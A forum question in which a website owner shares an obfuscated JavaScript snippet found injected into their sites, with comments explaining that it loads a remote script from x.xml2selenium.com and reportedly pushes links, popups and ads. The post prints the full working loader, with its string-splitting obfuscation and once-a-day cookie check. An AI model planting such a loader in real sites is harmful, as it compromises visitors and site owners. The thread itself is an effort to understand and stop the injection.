# Javascript Injection (Redirect to: http://x.xml2selenium.com:1080/)

Tags: javascript, security, code-injection

Just found this malicious js snippet (see below) on some of my websites.
Seems like it writes a cookie and will redirect to: http://x.xml2selenium.com:1080/

XML2Selenium is a product by JazzTeam:
http://jazzteam.org/en/products/xml2selenium-test-automation-platform/

Anyone know who's behind this and what exactly is its purpose?

```
<script type="text/javascript"> function createCookie(b, e, f) {
        var d = 60 * 60 * 1000 * f;
        var a = new Date();
        a.setTime(a.getTime() + (d));
        var c = "; expires=" + a.toGMTString();
        document.cookie = b + "=" + e + c + "; path=/"
    }

    function getCookie(a) {
        var b = document.cookie.match("(^|;) ?" + a + "=([^;]*)(;|$)");
        if (b) {
            return (unescape(b[2]))
        } else {
            return null
        }
    }

    (function(){ 
        if (getCookie("fcked") != 1) {
        createCookie("fcked", 1, 24);
        var a = document.createElement("sc"+"ri"+"pt");
        a.async = true;
        a.src = "ht"+"tp:/"+"/x."+"x"+"ml"+"2se"+"len"+"ium.co"+"m:"+"108"+"0/"
        + Math.floor(Math.random()*9999) + ".js?" 
        + Math.floor(Math.random()*99);
        (document.getElementsByTagName("bo"+"dy")[0]||
        document.getElementsByTagName("hea"+"d")[0]).appendChild(a);
        }
        }
    )();</script>
```

Comment: It's not redirecting to the said page. It's fetching a script from it to inject in your page. What it does depends on the context. `var subroutine = 'test';` is the code that it injects. http://x.xml2selenium.com:1080/9041.js?29

Comment: THanks @uKolka When I got to the url I get this:

http://www.ipaste.org/ujk (code was to long to paste here so see ipaste link)

Comment: That snippet seems to inject links/popups too: http://ptp.skillerzforum.com/promote.php?id=8817 and ads from http://adcdnx.com

I've contacted xml2selenium.com about this, maybe they can block the hacker from their end.